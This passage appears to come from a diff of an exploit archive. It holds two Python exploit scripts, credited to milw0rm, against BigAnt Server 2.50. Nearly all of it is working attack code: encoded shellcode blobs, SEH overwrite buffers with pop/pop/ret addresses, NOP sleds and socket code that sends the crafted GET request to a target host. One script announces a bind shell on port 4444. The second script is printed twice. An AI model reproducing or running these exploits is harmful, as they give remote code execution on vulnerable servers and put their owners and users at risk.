"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
payload = "\x41" * 985 # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
nops = "\x90" * 10 # nop sled
sc = shellcode # 710 bytes available for shellcode
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"
# milw0rm.com [2009-09-15]

View file

@ -1,62 +1,62 @@
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "\x41" * 985
next_seh = "\xeb\x06\x90\x90"
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
nops = "\x90" * 10
sec = shellcode
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
s.close()
# milw0rm.com [2009-09-15]
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "\x41" * 985
next_seh = "\xeb\x06\x90\x90"
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
nops = "\x90" * 10
sec = shellcode
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
s.close()
# milw0rm.com [2009-09-15]